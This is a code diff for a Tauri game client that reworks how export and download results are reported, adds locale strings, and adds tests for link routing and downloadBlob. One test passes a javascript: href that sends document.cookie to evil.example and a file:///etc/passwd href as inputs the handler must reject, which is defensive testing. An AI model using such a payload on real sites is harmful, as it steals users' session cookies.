+    expect(screen.getByRole("button", { name: "Export failed" })).toBeInTheDocument();
+
+    // The first export's reset is due here and has no claim on this result.
+    act(() => vi.advanceTimersByTime(600));
+    expect(screen.getByRole("button", { name: "Export failed" })).toBeInTheDocument();
+
+    // The later export's own reset still clears it.
+    act(() => vi.advanceTimersByTime(1_500));
+    expect(
+      screen.getByRole("button", { name: "Export client snapshot" }),
+    ).toBeInTheDocument();
+  });
+
+  // Same class, same idiom: the copy confirmation shares the two-second reset.
+  it("keeps a later copy's confirmation when the earlier copy's reset comes due", async () => {
+    vi.useFakeTimers();
+    copyText.mockResolvedValue(true);
+    renderModal();
+
+    act(() => notifyEngineLost("submitAction-retry-panic", "panicked at engine.rs:1: broken"));
+    const copyButton = screen.getByRole("button", { name: "Copy diagnostic" });
+    const copyOnce = async () => {
+      const settled = Promise.resolve(true);
+      copyText.mockReturnValueOnce(settled);
+      fireEvent.click(copyButton);
+      await act(async () => {
+        await settled;
+      });
+    };
+
+    await copyOnce();
+    expect(screen.getByRole("button", { name: "Copied!" })).toBeInTheDocument();
+
+    act(() => vi.advanceTimersByTime(1_500));
+    await copyOnce();
+
+    // The first copy's reset is due here and has no claim on this confirmation.
+    act(() => vi.advanceTimersByTime(600));
+    expect(screen.getByRole("button", { name: "Copied!" })).toBeInTheDocument();
+
+    // The later copy's own reset still clears it.
+    act(() => vi.advanceTimersByTime(1_500));
+    expect(screen.getByRole("button", { name: "Copy diagnostic" })).toBeInTheDocument();
   });
 });

--- a/client/src/hooks/useKeyboardShortcuts.ts
+++ b/client/src/hooks/useKeyboardShortcuts.ts
@@ -193,7 +193,17 @@ export function useKeyboardShortcuts(): void {
             e.preventDefault();
             if (adapter?.exportPersistenceState && canExportAuthoritativeState(gameMode)) {
               exportAuthoritativeGameStateZip(adapter)
-                .then((filename) => console.log(`[Debug] Game state exported to ${filename}`))
+                .then((result) => {
+                  if (result.kind === "failed") {
+                    console.error("[Debug] Game state export failed");
+                  } else if (result.kind === "requested") {
+                    console.log(`[Debug] Game state export requested (${result.filename})`);
+                  } else if (result.path) {
+                    console.log(`[Debug] Game state exported to ${result.path}`);
+                  } else {
+                    console.log(`[Debug] Game state exported ${result.filename}`);
+                  }
+                })
                 .catch((err) => console.error("[Debug] Failed to export:", err));
             }
           } else if (!e.ctrlKey && !e.metaKey) {

--- a/client/src/i18n/locales/de/common.json
+++ b/client/src/i18n/locales/de/common.json
@@ -175,6 +175,8 @@
       "copied": "Spielzustand in die Zwischenablage kopiert.",
       "copyFailed": "Spielzustand konnte nicht kopiert werden.",
       "exported": "{{filename}} exportiert.",
+      "exportedTo": "Nach {{path}} exportiert.",
+      "exportRequested": "Export angefordert: {{filename}}.",
       "exportFailed": "Spielzustand konnte nicht exportiert werden.",
       "replayExported": "Wiederholung gespeichert als {{filename}}.",
       "replayExportUnavailable": "Für diese Partie ist keine Wiederholungsaufzeichnung verfügbar.",

--- a/client/src/i18n/locales/de/game.json
+++ b/client/src/i18n/locales/de/game.json
@@ -2115,6 +2115,7 @@
     "exportClientSnapshot": "Client-Snapshot exportieren",
     "exported": "Exportiert",
     "exportFailed": "Export fehlgeschlagen",
+    "exportRequested": "Export unbestätigt",
     "copyDiagnostic": "Diagnose kopieren",
     "copied": "Kopiert!",
     "reportOnGithub": "Auf GitHub melden",

--- a/client/src/i18n/locales/en/common.json
+++ b/client/src/i18n/locales/en/common.json
@@ -175,6 +175,8 @@
       "copied": "Copied game state to clipboard.",
       "copyFailed": "Could not copy game state.",
       "exported": "Exported {{filename}}.",
+      "exportedTo": "Exported to {{path}}.",
+      "exportRequested": "Export requested — {{filename}}.",
       "exportFailed": "Could not export game state.",
       "replayExported": "Replay saved as {{filename}}.",
       "replayExportUnavailable": "No replay recording is available for this game.",

--- a/client/src/i18n/locales/en/game.json
+++ b/client/src/i18n/locales/en/game.json
@@ -2153,6 +2153,7 @@
     "exportClientSnapshot": "Export client snapshot",
     "exported": "Exported",
     "exportFailed": "Export failed",
+    "exportRequested": "Export unconfirmed",
     "copyDiagnostic": "Copy diagnostic",
     "copied": "Copied!",
     "reportOnGithub": "Report on GitHub",

--- a/client/src/i18n/locales/es/common.json
+++ b/client/src/i18n/locales/es/common.json
@@ -175,6 +175,8 @@
       "copied": "Estado de la partida copiado al portapapeles.",
       "copyFailed": "No se pudo copiar el estado de la partida.",
       "exported": "Se exportó {{filename}}.",
+      "exportedTo": "Se exportó a {{path}}.",
+      "exportRequested": "Exportación solicitada: {{filename}}.",
       "exportFailed": "No se pudo exportar el estado de la partida.",
       "replayExported": "Repetición guardada como {{filename}}.",
       "replayExportUnavailable": "No hay ninguna grabación de repetición disponible para esta partida.",

--- a/client/src/i18n/locales/es/game.json
+++ b/client/src/i18n/locales/es/game.json
@@ -2115,6 +2115,7 @@
     "exportClientSnapshot": "Exportar instantánea del cliente",
     "exported": "Exportado",
     "exportFailed": "Error al exportar",
+    "exportRequested": "Exportación sin confirmar",
     "copyDiagnostic": "Copiar diagnóstico",
     "copied": "¡Copiado!",
     "reportOnGithub": "Informar en GitHub",

--- a/client/src/i18n/locales/fr/common.json
+++ b/client/src/i18n/locales/fr/common.json
@@ -175,6 +175,8 @@
       "copied": "État de la partie copié dans le presse-papiers.",
       "copyFailed": "Impossible de copier l'état de la partie.",
       "exported": "{{filename}} exporté.",
+      "exportedTo": "Exporté vers {{path}}.",
+      "exportRequested": "Export demandé — {{filename}}.",
       "exportFailed": "Impossible d'exporter l'état de la partie.",
       "replayExported": "Replay enregistré sous {{filename}}.",
       "replayExportUnavailable": "Aucun enregistrement de replay n'est disponible pour cette partie.",

--- a/client/src/i18n/locales/fr/game.json
+++ b/client/src/i18n/locales/fr/game.json
@@ -2115,6 +2115,7 @@
     "exportClientSnapshot": "Exporter l’instantané du client",
     "exported": "Exporté",
     "exportFailed": "Échec de l'exportation",
+    "exportRequested": "Export non confirmé",
     "copyDiagnostic": "Copier le diagnostic",
     "copied": "Copié !",
     "reportOnGithub": "Signaler sur GitHub",

--- a/client/src/i18n/locales/it/common.json
+++ b/client/src/i18n/locales/it/common.json
@@ -175,6 +175,8 @@
       "copied": "Stato della partita copiato negli appunti.",
       "copyFailed": "Impossibile copiare lo stato della partita.",
       "exported": "Esportato {{filename}}.",
+      "exportedTo": "Esportato in {{path}}.",
+      "exportRequested": "Esportazione richiesta: {{filename}}.",
       "exportFailed": "Impossibile esportare lo stato della partita.",
       "replayExported": "Replay salvato come {{filename}}.",
       "replayExportUnavailable": "Nessuna registrazione di replay disponibile per questa partita.",

--- a/client/src/i18n/locales/it/game.json
+++ b/client/src/i18n/locales/it/game.json
@@ -2115,6 +2115,7 @@
     "exportClientSnapshot": "Esporta istantanea del client",
     "exported": "Esportato",
     "exportFailed": "Esportazione non riuscita",
+    "exportRequested": "Esportazione non confermata",
     "copyDiagnostic": "Copia diagnostica",
     "copied": "Copiato!",
     "reportOnGithub": "Segnala su GitHub",

--- a/client/src/i18n/locales/pl/common.json
+++ b/client/src/i18n/locales/pl/common.json
@@ -175,6 +175,8 @@
       "copied": "Skopiowano stan gry do schowka.",
       "copyFailed": "Nie można skopiować stanu gry.",
       "exported": "Wyeksportowano {{filename}}.",
+      "exportedTo": "Wyeksportowano do {{path}}.",
+      "exportRequested": "Zażądano eksportu: {{filename}}.",
       "exportFailed": "Nie można wyeksportować stanu gry.",
       "replayExported": "Powtórka zapisana jako {{filename}}.",
       "replayExportUnavailable": "Brak dostępnego nagrania powtórki dla tej rozgrywki.",

--- a/client/src/i18n/locales/pl/game.json
+++ b/client/src/i18n/locales/pl/game.json
@@ -2115,6 +2115,7 @@
     "exportClientSnapshot": "Eksportuj migawkę klienta",
     "exported": "Wyeksportowano",
     "exportFailed": "Eksport nie powiódł się",
+    "exportRequested": "Eksport niepotwierdzony",
     "copyDiagnostic": "Kopiuj diagnostykę",
     "copied": "Skopiowano!",
     "reportOnGithub": "Zgłoś na GitHub",

--- a/client/src/i18n/locales/pt/common.json
+++ b/client/src/i18n/locales/pt/common.json
@@ -175,6 +175,8 @@
       "copied": "Estado do jogo copiado para a área de transferência.",
       "copyFailed": "Não foi possível copiar o estado do jogo.",
       "exported": "{{filename}} exportado.",
+      "exportedTo": "Exportado para {{path}}.",
+      "exportRequested": "Exportação solicitada: {{filename}}.",
       "exportFailed": "Não foi possível exportar o estado do jogo.",
       "replayExported": "Replay salvo como {{filename}}.",
       "replayExportUnavailable": "Nenhuma gravação de replay disponível para esta partida.",

--- a/client/src/i18n/locales/pt/game.json
+++ b/client/src/i18n/locales/pt/game.json
@@ -2115,6 +2115,7 @@
     "exportClientSnapshot": "Exportar instantâneo do cliente",
     "exported": "Exportado",
     "exportFailed": "Falha na exportação",
+    "exportRequested": "Exportação não confirmada",
     "copyDiagnostic": "Copiar diagnóstico",
     "copied": "Copiado!",
     "reportOnGithub": "Reportar no GitHub",

--- a/client/src/services/__tests__/externalLinks.test.ts
+++ b/client/src/services/__tests__/externalLinks.test.ts
@@ -19,9 +19,15 @@ vi.mock("@tauri-apps/plugin-opener", () => {
 
 import { FIRST_PARTY_ORIGINS, installTauriExternalLinkHandler } from "../externalLinks";
 
-function click(href: string, nested = false, init: MouseEventInit = {}): MouseEvent {
+function click(
+  href: string,
+  nested = false,
+  init: MouseEventInit = {},
+  attrs: Record<string, string> = {},
+): MouseEvent {
   const anchor = document.createElement("a");
   anchor.setAttribute("href", href);
+  for (const [name, value] of Object.entries(attrs)) anchor.setAttribute(name, value);
   const target = nested ? document.createElement("span") : anchor;
   if (nested) anchor.append(target);
   document.body.append(anchor);
@@ -109,6 +115,46 @@ describe("Tauri document external-link routing", () => {
   ])("preserves first-party remote-shell navigation for %s", (url) => {
     expect(click(url).defaultPrevented).toBe(false);
     expect(mocks.openUrl).not.toHaveBeenCalled();
+  });
+
+  // A blob: href is the page's own bytes -- a file save -- not a link the shell
+  // could open. Cancelling it cancels the download itself, which is what
+  // silently ate every desktop export.
+  it("leaves a blob: download anchor to the browser's default action", () => {
+    const event = click(
+      `blob:${window.location.origin}/0f8a4c21-download`,
+      false,
+      {},
+      { download: "game-state.zip" },
+    );
+
+    expect(event.defaultPrevented).toBe(false);
+    expect(mocks.openUrl).not.toHaveBeenCalled();
+  });
+
+  it.each([
+    "javascript:fetch('https://evil.example/'+document.cookie)",
+    "file:///etc/passwd",
+    "data:text/plain;base64,cGhhc2U=",
+  ])(
+    "denies %s despite its download attribute, which a download-attribute predicate would admit",
+    (href) => {
+      // Browsers ignore `download` on a javascript: URL and run the script, so
+      // the admitted set is keyed on the scheme, never on the attribute. data:
+      // stays out of it because the shell's navigation guard spares only blob:,
+      // so admitting it would let a data: click abort the running game.
+      const event = click(href, false, {}, { download: "notes.txt" });
+
+      expect(event.defaultPrevented).toBe(true);
+      expect(mocks.openUrl).not.toHaveBeenCalled();
+    },
+  );
+
+  it("still routes an external HTTPS anchor through the opener when it carries a download attribute", async () => {
+    const event = click("https://example.com/cards", false, {}, { download: "cards.html" });
+
+    expect(event.defaultPrevented).toBe(true);
+    await vi.waitFor(() => expect(mocks.openUrl).toHaveBeenCalledWith("https://example.com/cards"));
   });
 
   it("installs only once", () => {

--- a/client/src/services/__tests__/externalLinks.test.ts
+++ b/client/src/services/__tests__/externalLinks.test.ts
@@ -129,6 +129,26 @@ describe("Tauri document external-link routing", () => {
     expect(mocks.openUrl).not.toHaveBeenCalled();
   });
 
+  it("denies a foreign-origin blob: download anchor", () => {
+    // A blob: URL carries the origin that created it, so only a same-origin one
+    // is the page's own bytes. jsdom follows every anchor this file leaves
+    // uncancelled, so the document origin is whatever the last such test
+    // navigated to; pinned because from the blob: URL the download test below
+    // leaves behind, the router branch admits every blob: href before this
+    // check is reached.
+    expect(window.location.origin).toBe("https://preview.phase-rs.dev");
+
+    const event = click(
+      "blob:https://evil.example/0f8a4c21-download",
+      false,
+      {},
+      { download: "game-state.zip" },
+    );
+
+    expect(event.defaultPrevented).toBe(true);
+    expect(mocks.openUrl).not.toHaveBeenCalled();
+  });
+
   // A blob: href is the page's own bytes -- a file save -- not a link the shell
   // could open. Cancelling it cancels the download itself, which is what
   // silently ate every desktop export.

--- a/client/src/services/__tests__/externalLinks.test.ts
+++ b/client/src/services/__tests__/externalLinks.test.ts
@@ -117,6 +117,18 @@ describe("Tauri document external-link routing", () => {
     expect(mocks.openUrl).not.toHaveBeenCalled();
   });
 
+  it("denies a blob: document link that is not a download", () => {
+    // Only a file save is exempt; a blob: document belongs to the deny path,
+    // which is reachable only from an HTTP(S) page: the router branch admits any
+    // blob: href once the document itself sits at one.
+    expect(window.location.protocol).toMatch(/^https?:$/);
+
+    const event = click("blob:https://phase-rs.dev/0f8a4c21-document");
+
+    expect(event.defaultPrevented).toBe(true);
+    expect(mocks.openUrl).not.toHaveBeenCalled();
+  });
+
   // A blob: href is the page's own bytes -- a file save -- not a link the shell
   // could open. Cancelling it cancels the download itself, which is what
   // silently ate every desktop export.
@@ -140,9 +152,10 @@ describe("Tauri document external-link routing", () => {
     "denies %s despite its download attribute, which a download-attribute predicate would admit",
     (href) => {
       // Browsers ignore `download` on a javascript: URL and run the script, so
-      // the admitted set is keyed on the scheme, never on the attribute. data:
-      // stays out of it because the shell's navigation guard spares only blob:,
-      // so admitting it would let a data: click abort the running game.
+      // the attribute never admits anything on its own -- the scheme has to
+      // match too. data: stays out of it because the shell's navigation guard
+      // spares only blob:, so admitting it would let a data: click abort the
+      // running game.
       const event = click(href, false, {}, { download: "notes.txt" });
 
       expect(event.defaultPrevented).toBe(true);

--- a/client/src/services/__tests__/fileDownload.test.ts
+++ b/client/src/services/__tests__/fileDownload.test.ts
@@ -1,14 +1,68 @@
-import { afterEach, describe, expect, it, vi } from "vitest";
+import { afterEach, beforeEach, describe, expect, it, vi } from "vitest";
 
-import { downloadBlob } from "../fileDownload.ts";
+import type { UnlistenFn } from "@tauri-apps/api/event";
+
+const { isDesktopTauriMock, listenMock, eventModule } = vi.hoisted(() => ({
+  isDesktopTauriMock: vi.fn(),
+  listenMock: vi.fn(),
+  eventModule: { reads: 0, failRead: false },
+}));
+
+vi.mock("../platform", () => ({ isDesktopTauri: isDesktopTauriMock }));
+// A getter, not a plain property: the mock factory runs once per test FILE, so
+// a counter inside it cannot tell "never imported" from "imported by an earlier
+// test". Reading `listen` is what every consumer of this module does.
+vi.mock("@tauri-apps/api/event", () => ({
+  get listen() {
+    eventModule.reads += 1;
+    // Stands in for a dynamic import whose module never loads: a failed chunk
+    // load rejects the import() itself while this throws from the .then, and
+    // both land in the same .catch, which is the fallback under test.
+    if (eventModule.failRead) throw new Error("failed to fetch dynamically imported module");
+    return listenMock;
+  },
+}));
+
+interface ShellDownload {
+  url: string;
+  path: string | null;
+  success: boolean;
+}
 
 describe("downloadBlob", () => {
+  /** Every listen/click in the order it happened — the race is the point. */
+  let calls: string[] = [];
+  let emit: ((payload: ShellDownload) => void) | null = null;
+  let unlisten = vi.fn();
+
+  async function fileDownload() {
+    return import("../fileDownload.ts");
+  }
+
+  beforeEach(() => {
+    vi.resetModules();
+    calls = [];
+    emit = null;
+    eventModule.reads = 0;
+    eventModule.failRead = false;
+    unlisten = vi.fn();
+    isDesktopTauriMock.mockReturnValue(false);
+    listenMock.mockImplementation(
+      async (_event: string, handler: (event: { payload: ShellDownload }) => void) => {
+        calls.push("listen");
+        emit = (payload) => handler({ payload });
+        return unlisten as unknown as UnlistenFn;
+      },
+    );
+  });
+
   afterEach(() => {
+    vi.useRealTimers();
     vi.restoreAllMocks();
     Reflect.deleteProperty(window, "showSaveFilePicker");
   });
 
-  function stubAnchorDownload() {
+  function stubAnchorDownload(onClick?: () => void) {
     let downloadedBlob: Blob | null = null;
     let downloadedName: string | null = null;
     vi.spyOn(URL, "createObjectURL").mockImplementation((blob) => {
@@ -19,11 +73,21 @@ describe("downloadBlob", () => {
     vi.spyOn(HTMLAnchorElement.prototype, "click").mockImplementation(function (
       this: HTMLAnchorElement,
     ) {
+      calls.push("click");
       downloadedName = this.download;
+      onClick?.();
     });
     return {
       blob: () => downloadedBlob,
       filename: () => downloadedName,
+    };
+  }
+
+  /** The shell reports the finished download the moment the click lands. */
+  function shellFinishes(payload: Omit<ShellDownload, "url">) {
+    return () => {
+      if (!emit) throw new Error("clicked before subscribing to shell-download");
+      emit({ url: "blob:mock-url", ...payload });
     };
   }
 
@@ -38,12 +102,14 @@ describe("downloadBlob", () => {
       value: showSaveFilePicker,
     });
     const blob = new Blob(["data"], { type: "text/plain" });
+    const { downloadBlob } = await fileDownload();
 
-    const filename = await downloadBlob("notes.txt", blob, [
+    const result = await downloadBlob("notes.txt", blob, [
       { description: "Text", accept: { "text/plain": [".txt"] } },
     ]);
 
-    expect(filename).toBe("notes.txt");
+    // The picker writes wherever the user pointed it and never says where.
+    expect(result).toStrictEqual({ kind: "saved", filename: "notes.txt" });
     expect(showSaveFilePicker).toHaveBeenCalledWith({
       suggestedName: "notes.txt",
       types: [{ description: "Text", accept: { "text/plain": [".txt"] } }],
@@ -63,12 +129,168 @@ describe("downloadBlob", () => {
     });
     const anchor = stubAnchorDownload();
     const blob = new Blob(["data"], { type: "text/plain" });
+    const { downloadBlob } = await fileDownload();
 
-    const filename = await downloadBlob("notes.txt", blob);
+    const result = await downloadBlob("notes.txt", blob);
 
-    expect(filename).toBe("notes.txt");
+    expect(result).toStrictEqual({ kind: "saved", filename: "notes.txt" });
     expect(anchor.filename()).toBe("notes.txt");
     expect(anchor.blob()).toBe(blob);
+  });
+
+  it("reports an anchor download in a browser without waiting on any shell", async () => {
+    const anchor = stubAnchorDownload();
+    const { downloadBlob } = await fileDownload();
+
+    const result = await downloadBlob("notes.txt", new Blob(["data"]));
+
+    // No path: a browser cannot learn one, and claiming one would be a lie.
+    expect(result).toStrictEqual({ kind: "saved", filename: "notes.txt" });
+    expect(anchor.filename()).toBe("notes.txt");
+    // Paired with the shell cases below, which do read it: off the shell the
+    // tauri event module must not be pulled in at all.
+    expect(eventModule.reads).toBe(0);
+    expect(listenMock).not.toHaveBeenCalled();
+  });
+
+  it("subscribes to the shell's download event before clicking", async () => {
+    // A small download can finish before a listener registered after the click
+    // would exist, so the order here is the whole mechanism.
+    isDesktopTauriMock.mockReturnValue(true);
+    stubAnchorDownload(shellFinishes({ path: "/home/u/Downloads/notes.txt", success: true }));
+    const { downloadBlob } = await fileDownload();
+
+    await downloadBlob("notes.txt", new Blob(["data"]));
+
+    expect(calls).toEqual(["listen", "click"]);
+    expect(listenMock).toHaveBeenCalledWith("shell-download", expect.any(Function));
+    expect(eventModule.reads).toBe(1);
+  });
+
+  it("reports the shell's absolute path when the download succeeds", async () => {
+    isDesktopTauriMock.mockReturnValue(true);
+    stubAnchorDownload(shellFinishes({ path: "/home/u/Downloads/notes.txt", success: true }));
+    const { downloadBlob } = await fileDownload();
+
+    const result = await downloadBlob("notes.txt", new Blob(["data"]));
+
+    expect(result).toStrictEqual({
+      kind: "saved",
+      filename: "notes.txt",
+      path: "/home/u/Downloads/notes.txt",
+    });
+    expect(unlisten).toHaveBeenCalledOnce();
+  });
+
+  it("reports a failure when the shell says the download failed", async () => {
+    isDesktopTauriMock.mockReturnValue(true);
+    stubAnchorDownload(shellFinishes({ path: "/home/u/Downloads/notes.txt", success: false }));
+    const { downloadBlob } = await fileDownload();
+
+    const result = await downloadBlob("notes.txt", new Blob(["data"]));
+
+    expect(result).toStrictEqual({
+      kind: "failed",
+      filename: "notes.txt",
+      path: "/home/u/Downloads/notes.txt",
+    });
+    expect(unlisten).toHaveBeenCalledOnce();
+  });
+
+  it("ignores a shell report for another download and waits for its own", async () => {
+    // Two exports can overlap inside the 10 s wait, and the log dump in
+    // DebugPanel is another shell download entirely. Settling on whoever
+    // reports first would print the other file's path.
+    isDesktopTauriMock.mockReturnValue(true);
+    stubAnchorDownload(() => {
+      if (!emit) throw new Error("clicked before subscribing to shell-download");
+      emit({ url: "blob:another-export", path: "/home/u/Downloads/other.zip", success: false });
+      emit({ url: "blob:mock-url", path: "/home/u/Downloads/notes.txt", success: true });
+    });
+    const { downloadBlob } = await fileDownload();
+
+    const result = await downloadBlob("notes.txt", new Blob(["data"]));
+
+    expect(result).toStrictEqual({
+      kind: "saved",
+      filename: "notes.txt",
+      path: "/home/u/Downloads/notes.txt",
+    });
+  });
+
+  it("keeps a pathless shell report honest", async () => {
+    isDesktopTauriMock.mockReturnValue(true);
+    stubAnchorDownload(shellFinishes({ path: null, success: true }));
+    const { downloadBlob } = await fileDownload();
+
+    const result = await downloadBlob("notes.txt", new Blob(["data"]));
+
+    expect(result).toStrictEqual({ kind: "saved", filename: "notes.txt", path: undefined });
+  });
+
+  it("falls back to 'requested' when the shell reports nothing in time", async () => {
+    isDesktopTauriMock.mockReturnValue(true);
+    vi.useFakeTimers();
+    stubAnchorDownload();
+    const { downloadBlob } = await fileDownload();
+
+    const pending = downloadBlob("notes.txt", new Blob(["data"]));
+    await vi.advanceTimersByTimeAsync(10_000);
+
+    // Nothing was heard, so the message must not claim the file was saved.
+    expect(await pending).toStrictEqual({ kind: "requested", filename: "notes.txt" });
+    expect(calls).toEqual(["listen", "click"]);
+    expect(unlisten).toHaveBeenCalledOnce();
+  });
+
+  it("does not resolve before the shell reports or the wait elapses", async () => {
+    isDesktopTauriMock.mockReturnValue(true);
+    vi.useFakeTimers();
+    stubAnchorDownload();
+    const { downloadBlob } = await fileDownload();
+    const settled = vi.fn();
+
+    void downloadBlob("notes.txt", new Blob(["data"])).then(settled);
+    await vi.advanceTimersByTimeAsync(9_000);
+
+    // Guards the timeout test above: without this, a result that resolved
+    // immediately would still look like a "timeout".
+    expect(settled).not.toHaveBeenCalled();
+    expect(calls).toEqual(["listen", "click"]);
+
+    await vi.advanceTimersByTimeAsync(1_000);
+    expect(settled).toHaveBeenCalledWith({ kind: "requested", filename: "notes.txt" });
+  });
+
+  it("still downloads when the tauri event module cannot be loaded", async () => {
+    // Setup runs before the click, so a failure here would otherwise cost the
+    // user the export itself — the exact shape this whole change exists to fix.
+    isDesktopTauriMock.mockReturnValue(true);
+    eventModule.failRead = true;
+    const anchor = stubAnchorDownload();
+    const { downloadBlob } = await fileDownload();
+
+    const result = await downloadBlob("notes.txt", new Blob(["data"]));
+
+    expect(result).toStrictEqual({ kind: "requested", filename: "notes.txt" });
+    expect(calls).toEqual(["click"]);
+    expect(anchor.filename()).toBe("notes.txt");
+    expect(unlisten).not.toHaveBeenCalled();
+  });
+
+  it("still downloads when subscribing to the shell event is refused", async () => {
+    isDesktopTauriMock.mockReturnValue(true);
+    listenMock.mockRejectedValueOnce(new Error("event.listen not allowed"));
+    const anchor = stubAnchorDownload();
+    const { downloadBlob } = await fileDownload();
+
+    const result = await downloadBlob("notes.txt", new Blob(["data"]));
+
+    expect(result).toStrictEqual({ kind: "requested", filename: "notes.txt" });
+    // Exactly one click, and no listener left behind to unsubscribe.
+    expect(calls).toEqual(["click"]);
+    expect(anchor.filename()).toBe("notes.txt");
+    expect(unlisten).not.toHaveBeenCalled();
   });
 
   it("does not download when the user cancels the picker", async () => {
@@ -81,6 +303,7 @@ describe("downloadBlob", () => {
     const clickSpy = vi
       .spyOn(HTMLAnchorElement.prototype, "click")
       .mockImplementation(() => {});
+    const { downloadBlob } = await fileDownload();
 
     const err = await downloadBlob("notes.txt", new Blob(["data"])).catch((e: unknown) => e);
 
@@ -111,6 +334,7 @@ describe("downloadBlob", () => {
         })),
       });
       const anchor = stubAnchorDownload();
+      const { downloadBlob } = await fileDownload();
 
       await expect(downloadBlob("notes.txt", new Blob(["data"]))).rejects.toBe(streamError);
 

--- a/client/src/services/__tests__/fileDownload.test.ts
+++ b/client/src/services/__tests__/fileDownload.test.ts
@@ -26,7 +26,7 @@ vi.mock("@tauri-apps/api/event", () => ({
 interface ShellDownload {
   url: string;
   path: string | null;
-  success: boolean;
+  outcome: "saved" | "unknown" | "failed";
 }
 
 describe("downloadBlob", () => {
@@ -157,7 +157,7 @@ describe("downloadBlob", () => {
     // A small download can finish before a listener registered after the click
     // would exist, so the order here is the whole mechanism.
     isDesktopTauriMock.mockReturnValue(true);
-    stubAnchorDownload(shellFinishes({ path: "/home/u/Downloads/notes.txt", success: true }));
+    stubAnchorDownload(shellFinishes({ path: "~/Downloads/notes.txt", outcome: "saved" }));
     const { downloadBlob } = await fileDownload();
 
     await downloadBlob("notes.txt", new Blob(["data"]));
@@ -167,9 +167,9 @@ describe("downloadBlob", () => {
     expect(eventModule.reads).toBe(1);
   });
 
-  it("reports the shell's absolute path when the download succeeds", async () => {
+  it("reports the path the shell gives when the download succeeds", async () => {
     isDesktopTauriMock.mockReturnValue(true);
-    stubAnchorDownload(shellFinishes({ path: "/home/u/Downloads/notes.txt", success: true }));
+    stubAnchorDownload(shellFinishes({ path: "~/Downloads/notes.txt", outcome: "saved" }));
     const { downloadBlob } = await fileDownload();
 
     const result = await downloadBlob("notes.txt", new Blob(["data"]));
@@ -177,14 +177,14 @@ describe("downloadBlob", () => {
     expect(result).toStrictEqual({
       kind: "saved",
       filename: "notes.txt",
-      path: "/home/u/Downloads/notes.txt",
+      path: "~/Downloads/notes.txt",
     });
     expect(unlisten).toHaveBeenCalledOnce();
   });
 
   it("reports a failure when the shell says the download failed", async () => {
     isDesktopTauriMock.mockReturnValue(true);
-    stubAnchorDownload(shellFinishes({ path: "/home/u/Downloads/notes.txt", success: false }));
+    stubAnchorDownload(shellFinishes({ path: "~/Downloads/notes.txt", outcome: "failed" }));
     const { downloadBlob } = await fileDownload();
 
     const result = await downloadBlob("notes.txt", new Blob(["data"]));
@@ -192,8 +192,22 @@ describe("downloadBlob", () => {
     expect(result).toStrictEqual({
       kind: "failed",
       filename: "notes.txt",
-      path: "/home/u/Downloads/notes.txt",
+      path: "~/Downloads/notes.txt",
     });
+    expect(unlisten).toHaveBeenCalledOnce();
+  });
+
+  it("does not claim a save the shell could not confirm", async () => {
+    // A file at the destination after a reported failure is equally a stale
+    // latched failure flag and a write that died mid-file, so the shell says
+    // "unknown" and the page must not turn that into a saved file.
+    isDesktopTauriMock.mockReturnValue(true);
+    stubAnchorDownload(shellFinishes({ path: "~/Downloads/notes.txt", outcome: "unknown" }));
+    const { downloadBlob } = await fileDownload();
+
+    const result = await downloadBlob("notes.txt", new Blob(["data"]));
+
+    expect(result).toStrictEqual({ kind: "requested", filename: "notes.txt" });
     expect(unlisten).toHaveBeenCalledOnce();
   });
 
@@ -204,8 +218,8 @@ describe("downloadBlob", () => {
     isDesktopTauriMock.mockReturnValue(true);
     stubAnchorDownload(() => {
       if (!emit) throw new Error("clicked before subscribing to shell-download");
-      emit({ url: "blob:another-export", path: "/home/u/Downloads/other.zip", success: false });
-      emit({ url: "blob:mock-url", path: "/home/u/Downloads/notes.txt", success: true });
+      emit({ url: "blob:another-export", path: "~/Downloads/other.zip", outcome: "failed" });
+      emit({ url: "blob:mock-url", path: "~/Downloads/notes.txt", outcome: "saved" });
     });
     const { downloadBlob } = await fileDownload();
 
@@ -214,13 +228,13 @@ describe("downloadBlob", () => {
     expect(result).toStrictEqual({
       kind: "saved",
       filename: "notes.txt",
-      path: "/home/u/Downloads/notes.txt",
+      path: "~/Downloads/notes.txt",
     });
   });
 
   it("keeps a pathless shell report honest", async () => {
     isDesktopTauriMock.mockReturnValue(true);
-    stubAnchorDownload(shellFinishes({ path: null, success: true }));
+    stubAnchorDownload(shellFinishes({ path: null, outcome: "saved" }));
     const { downloadBlob } = await fileDownload();
 
     const result = await downloadBlob("notes.txt", new Blob(["data"]));

--- a/client/src/services/__tests__/gameStateExport.test.ts
+++ b/client/src/services/__tests__/gameStateExport.test.ts
@@ -57,9 +57,12 @@ describe("gameStateExport", () => {
       turnCheckpoints: [],
     });
 
-    const filename = await exportGameStateDebugZip(gameState);
+    const result = await exportGameStateDebugZip(gameState);
 
-    expect(filename).toMatch(/^game-state-turn-7-.*\.zip$/);
+    expect(result).toStrictEqual({
+      kind: "saved",
+      filename: expect.stringMatching(/^game-state-turn-7-.*\.zip$/),
+    });
     expect(write).toHaveBeenCalledOnce();
     expect(close).toHaveBeenCalledOnce();
     expect(writtenBlob).not.toBeNull();
@@ -96,9 +99,12 @@ describe("gameStateExport", () => {
     });
     useGameStore.setState({ gameMode: "ai" });
 
-    const filename = await exportAuthoritativeGameStateZip(adapter);
+    const result = await exportAuthoritativeGameStateZip(adapter);
 
-    expect(filename).toMatch(/^authoritative-game-state-.*\.zip$/);
+    expect(result).toStrictEqual({
+      kind: "saved",
+      filename: expect.stringMatching(/^authoritative-game-state-.*\.zip$/),
+    });
     expect(adapter.exportPersistenceState).toHaveBeenCalledOnce();
     const entries = unzipSync(new Uint8Array(await writtenBlob!.arrayBuffer()));
     const [entryName] = Object.keys(entries);
@@ -106,7 +112,9 @@ describe("gameStateExport", () => {
     expect(strFromU8(entries[entryName])).toBe(trustedState);
 
     const imported = gameStateFromImportText(
-      await readImportFile(new File([writtenBlob!], filename, { type: "application/zip" })),
+      await readImportFile(
+        new File([writtenBlob!], result.filename, { type: "application/zip" }),
+      ),
     );
     expect(imported).toEqual(trustedEnvelope);
   });
@@ -164,9 +172,12 @@ describe("gameStateExport", () => {
     });
     useGameStore.setState({ gameMode: "ai" });
 
-    const filename = await exportAuthoritativeGameStateZip(adapter);
+    const result = await exportAuthoritativeGameStateZip(adapter);
 
-    expect(filename).toMatch(/^authoritative-game-state-.*\.zip$/);
+    expect(result).toStrictEqual({
+      kind: "saved",
+      filename: expect.stringMatching(/^authoritative-game-state-.*\.zip$/),
+    });
     expect(clickSpy).toHaveBeenCalledOnce();
     expect(downloadedBlob).not.toBeNull();
     const entries = unzipSync(new Uint8Array(await downloadedBlob!.arrayBuffer()));

--- a/client/src/services/externalLinks.ts
